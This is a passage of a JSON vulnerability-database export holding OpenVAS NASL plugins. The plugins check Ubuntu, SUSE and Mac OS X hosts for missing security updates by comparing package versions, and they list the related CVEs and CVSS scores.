\"CVE-2008-5625\", \"CVE-2008-5658\", \"CVE-2007-5625\", \"CVE-2007-6420\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2364\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-2939\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-719-1 (libpam-krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-719-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpam-krb5\", ver:\"3.10-1ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpam-krb5\", ver:\"3.10-1ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:20", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n websphere-as_ce\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for Websphere Community Edition", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-5342", "CVE-2007-5333", "CVE-2007-3382", "CVE-2007-0184", "CVE-2007-0185", "CVE-2008-1947", "CVE-2007-2450", "CVE-2007-2449", "CVE-2007-5613", "CVE-2007-3386", "CVE-2008-2938", "CVE-2007-5461", "CVE-2007-6286", "CVE-2008-2370", "CVE-2007-2377", "CVE-2007-3385", "CVE-2008-1232", "CVE-2007-5615", "CVE-2008-0002"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65836", "href": "http://plugins.openvas.org/nasl.php?oid=65836", "sourceData": "#\n#VID slesp2-websphere-as_ce-5850\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Websphere Community Edition\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n websphere-as_ce\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65836);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2007-0184\", \"CVE-2007-0185\", \"CVE-2007-2377\", \"CVE-2007-2449\", \"CVE-2007-2450\", \"CVE-2007-3382\", \"CVE-2007-3385\", \"CVE-2007-3386\", \"CVE-2007-5333\", \"CVE-2007-5342\", \"CVE-2007-5461\", \"CVE-2007-5613\", \"CVE-2007-5615\", \"CVE-2007-6286\", \"CVE-2008-0002\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES10: Security update for Websphere Community Edition\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"websphere-as_ce\", rpm:\"websphere-as_ce~2.1.0.1~3.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:13", "description": "The remote host is missing Security Update 2008-007.", "cvss3": {}, "published": "2010-05-12T00:00:00", "type": "openvas", "title": "Mac OS X Security Update 2008-007", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-4214", "CVE-2007-5342", "CVE-2008-3912", "CVE-2008-3646", "CVE-2008-1389", "CVE-2008-4215", "CVE-2008-3914", "CVE-2007-5333", "CVE-2008-2364", "CVE-2008-4212", "CVE-2008-3641", "CVE-2008-1678", "CVE-2008-2371", "CVE-2008-1947", "CVE-2008-3432", "CVE-2008-3643", "CVE-2008-0227", "CVE-2007-5969", "CVE-2008-4101", "CVE-2007-4850", "CVE-2008-2938", "CVE-2007-5461", "CVE-2008-0674", "CVE-2007-2691", "CVE-2008-0226", "CVE-2008-1767", "CVE-2008-2079", "CVE-2007-6286", "CVE-2008-3913", "CVE-2008-2370", "CVE-2008-4211", "CVE-2008-3294", "CVE-2008-3647", "CVE-2008-1232", "CVE-2008-2712", "CVE-2008-3645", "CVE-2007-6420", "CVE-2008-3642", "CVE-2008-0002"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310102025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310102025", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n# $Id: macosx_secupd_2008-007.nasl 14307 2019-03-19 10:09:27Z cfischer $\n#\n# Mac OS X Security Update 2008-007\n#\n# LSS-NVT-2010-014\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.102025\");\n script_version(\"$Revision: 14307 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 11:09:27 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-12 14:48:44 +0200 (Wed, 12 May 2010)\");\n script_cve_id(\"CVE-2007-6420\", \"CVE-2008-1678\", \"CVE-2008-2364\", \"CVE-2008-1389\", \"CVE-2008-3912\",\n \"CVE-2008-3913\", \"CVE-2008-3914\", \"CVE-2008-3642\", \"CVE-2008-3641\", \"CVE-2008-3643\",\n \"CVE-2008-1767\", \"CVE-2007-2691\", \"CVE-2007-5969\", \"CVE-2008-0226\", \"CVE-2008-0227\",\n \"CVE-2008-2079\", \"CVE-2008-3645\", \"CVE-2007-4850\", \"CVE-2008-0674\", \"CVE-2008-2371\",\n \"CVE-2008-3646\", \"CVE-2008-3647\", \"CVE-2008-4211\", \"CVE-2008-4212\", \"CVE-2008-4214\",\n \"CVE-2007-6286\", \"CVE-2008-0002\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\",\n \"CVE-2008-2938\", \"CVE-2007-5333\", \"CVE-2007-5342\", \"CVE-2007-5461\", \"CVE-2008-2712\",\n \"CVE-2008-4101\", \"CVE-2008-3432\", \"CVE-2008-3294\", \"CVE-2008-4215\");\n script_name(\"Mac OS X Security Update 2008-007\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.[45]\\.\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT3216\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing Security Update 2008-007.\");\n\n script_tag(name:\"affected\", value:\"One or more of the following components are affected:\n\n Apache\n\n Certificates\n\n ClamAV\n\n ColorSync\n\n CUPS\n\n Finder\n\n launchd\n\n libxslt\n\n MySQL Server\n\n Networking\n\n PHP\n\n Postfix\n\n PSNormalizer\n\n QuickLook\n\n rlogin\n\n Script Editor\n\n Single Sign-On\n\n Tomcat\n\n vim\n\n Weblog\");\n\n script_tag(name:\"solution\", value:\"Update your Mac OS X operating system. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver || ssh_osx_ver !~ \"^10\\.[45]\\.\") exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.5\",\"Mac OS X Server 10.5.5\",\"Mac OS X 10.4.11\",\"Mac OS X Server 10.4.11\");\n\nif (rlsnotsupported(rls:ssh_osx_rls, list:pkg_for_ver)) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.5\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.5.5\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X 10.5.5\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.5\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.5.5\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X Server 10.5.5\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.4.11\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.4.11\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.4.11\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.4.11\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X Server 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2008.007\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:01", "description": "The remote host is missing Security Update 2008-007.\n One or more of the following components are affected:\n\n Apache\n Certificates\n ClamAV\n ColorSync\n CUPS\n Finder\n launchd\n libxslt\n MySQL Server\n Networking\n PHP\n 